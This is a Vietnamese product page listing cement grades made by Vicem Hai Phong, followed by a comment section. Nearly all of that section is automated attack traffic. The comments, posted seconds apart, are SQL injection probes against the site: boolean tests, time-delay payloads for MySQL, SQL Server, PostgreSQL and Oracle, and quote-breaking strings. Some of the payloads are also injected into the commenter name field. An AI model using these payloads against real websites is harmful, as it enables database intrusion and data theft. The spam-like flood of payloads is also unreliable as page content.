Xi măng Vicem Hải Phòng

Xi măng Vicem Hải Phòng

Xi măng Vicem Hải Phòng

Giới thiệu Sản phẩm
Hãng sản xuất
Nhà phân phối

Các sản phẩm của "Công ty TNHH MTV Xi măng Vicem Hải Phòng" tham gia cam kết 3k:

1. Xi măng PCB30 rời

2. Xi măng PCB30 bao

3. Xi măng PCB30 bao

đa dụng

4. Xi măng PCB30 bao

GTNT

5. Xi măng PCB40 rời

6. Xi măng PCB40 bao

7. Xi măng Bền

Sunphat thường

(type – Loại 2)

8. Xi măng PC50 rời

9. Xi măng PC40 rời

10. Xi măng PC40 bao

Bình luận

Bình luận
ZMskyuza
01:44:49 - 01.06.2024

555

ZMskyuza
01:44:51 - 01.06.2024

555

ZMskyuza
01:44:52 - 01.06.2024

555

ZMskyuza
01:45:04 - 01.06.2024

555

ZMskyuza
01:45:05 - 01.06.2024

555

ZMskyuza
01:45:07 - 01.06.2024

555

ZMskyuza
01:45:25 - 01.06.2024

555

ZMskyuza
01:45:26 - 01.06.2024

555

ZMskyuza
01:45:27 - 01.06.2024

a07d2Tqt

ZMskyuza
01:45:27 - 01.06.2024

-1 OR 2+574-574-1=0+0+0+1 --

ZMskyuza
01:45:27 - 01.06.2024

-1 OR 2+873-873-1=0+0+0+1

ZMskyuza
01:45:27 - 01.06.2024

-1' OR 2+416-416-1=0+0+0+1 --

ZMskyuza
01:45:27 - 01.06.2024

-1' OR 2+616-616-1=0+0+0+1 or 'r7XizVER'='

ZMskyuza
01:45:27 - 01.06.2024

-1" OR 2+303-303-1=0+0+0+1 --

ZMskyuza
01:45:28 - 01.06.2024

if(now()=sysdate(),sleep(15),0)

ZMskyuza
01:45:29 - 01.06.2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

ZMskyuza
01:45:30 - 01.06.2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

ZMskyuza
01:45:31 - 01.06.2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

ZMskyuza
01:45:32 - 01.06.2024

-1; waitfor delay '0:0:15' --

ZMskyuza
01:45:33 - 01.06.2024

-1); waitfor delay '0:0:15' --

ZMskyuza
01:45:34 - 01.06.2024

-1)); waitfor delay '0:0:15' --

ZMskyuza
01:45:34 - 01.06.2024

1 waitfor delay '0:0:15' --

ZMskyuza
01:45:36 - 01.06.2024

fgM8PKCV'; waitfor delay '0:0:15' --

ZMskyuza
01:45:36 - 01.06.2024

SqUFiuZ2'); waitfor delay '0:0:15' --

ZMskyuza
01:45:37 - 01.06.2024

YdGc6FzD')); waitfor delay '0:0:15' --

ZMskyuza
01:45:39 - 01.06.2024

-5 OR 550=(SELECT 550 FROM PG_SLEEP(15))--

ZMskyuza
01:45:40 - 01.06.2024

-5) OR 479=(SELECT 479 FROM PG_SLEEP(15))--

ZMskyuza
01:45:40 - 01.06.2024

-1)) OR 219=(SELECT 219 FROM PG_SLEEP(15))--

ZMskyuza
01:45:41 - 01.06.2024

rfMGfSGW' OR 211=(SELECT 211 FROM PG_SLEEP(15))--

ZMskyuza
01:45:42 - 01.06.2024

Ym7Xr7b2') OR 176=(SELECT 176 FROM PG_SLEEP(15))--

ZMskyuza
01:45:43 - 01.06.2024

BgaDtZNl')) OR 852=(SELECT 852 FROM PG_SLEEP(15))--

ZMskyuza
01:45:44 - 01.06.2024

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

ZMskyuza
01:45:44 - 01.06.2024

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

ZMskyuza
01:45:45 - 01.06.2024

1'"

ZMskyuza
01:45:45 - 01.06.2024

1����%2527%2522

ZMskyuza
01:45:45 - 01.06.2024

@@n4QtI

ZMskyuza
01:45:45 - 01.06.2024

555

ZMskyuza
01:45:46 - 01.06.2024

555

ZMskyuza
01:45:47 - 01.06.2024

555

ZMskyuza
01:45:47 - 01.06.2024

555

ZMskyuza
01:45:47 - 01.06.2024

555

ZMskyuza
01:45:47 - 01.06.2024

555

ZMskyuza
01:45:47 - 01.06.2024

555

ZMskyuza
01:45:47 - 01.06.2024

555

ZMskyuza
01:45:48 - 01.06.2024

555

ZMskyuza
01:45:49 - 01.06.2024

555

ZMskyuza
01:45:49 - 01.06.2024

555

ZMskyuza
01:45:50 - 01.06.2024

555

ZMskyuza
01:45:51 - 01.06.2024

555

ZMskyuza
01:45:52 - 01.06.2024

555

ZMskyuza
01:45:52 - 01.06.2024

555

ZMskyuza
01:45:53 - 01.06.2024

555

ZMskyuza
01:45:53 - 01.06.2024

555

ZMskyuza
01:45:54 - 01.06.2024

555

ZMskyuza
01:45:54 - 01.06.2024

555

ZMskyuza
01:45:56 - 01.06.2024

555

ZMskyuza
01:45:56 - 01.06.2024

555

ZMskyuza
01:45:56 - 01.06.2024

555

ZMskyuza
01:45:56 - 01.06.2024

555

ZMskyuza
01:45:57 - 01.06.2024

555

ZMskyuza
01:45:58 - 01.06.2024

555

vYQFJVrs
01:45:58 - 01.06.2024

555

-1 OR 2+928-928-1=0+0+0+1 --
01:45:58 - 01.06.2024

555

-1 OR 2+157-157-1=0+0+0+1
01:45:58 - 01.06.2024

555

-1' OR 2+199-199-1=0+0+0+1 --
01:45:58 - 01.06.2024

555

-1' OR 2+642-642-1=0+0+0+1 or 'aM0mPZNl'='
01:45:58 - 01.06.2024

555

-1" OR 2+907-907-1=0+0+0+1 --
01:45:58 - 01.06.2024

555

if(now()=sysdate(),sleep(15),0)
01:46:00 - 01.06.2024

555

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
01:46:01 - 01.06.2024

555

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
01:46:02 - 01.06.2024

555

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
01:46:03 - 01.06.2024

555

1 waitfor delay '0:0:15' --
01:46:04 - 01.06.2024

555

wkfwrfoy'; waitfor delay '0:0:15' --
01:46:05 - 01.06.2024

555

SgTjG2Wl'); waitfor delay '0:0:15' --
01:46:06 - 01.06.2024

555

TtKtduLe')); waitfor delay '0:0:15' --
01:46:07 - 01.06.2024

555

Ahxcvxje' OR 337=(SELECT 337 FROM PG_SLEEP(15))--
01:46:08 - 01.06.2024

555

Vjh4YVAV') OR 351=(SELECT 351 FROM PG_SLEEP(15))--
01:46:09 - 01.06.2024

555

BgbsPJoi')) OR 798=(SELECT 798 FROM PG_SLEEP(15))--
01:46:09 - 01.06.2024

555

ZMskyuza'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
01:46:10 - 01.06.2024

555

1'"
01:46:10 - 01.06.2024

555

1����%2527%2522
01:46:10 - 01.06.2024

555

@@An1o0
01:46:10 - 01.06.2024

555

ZMskyuza
01:52:21 - 01.06.2024

555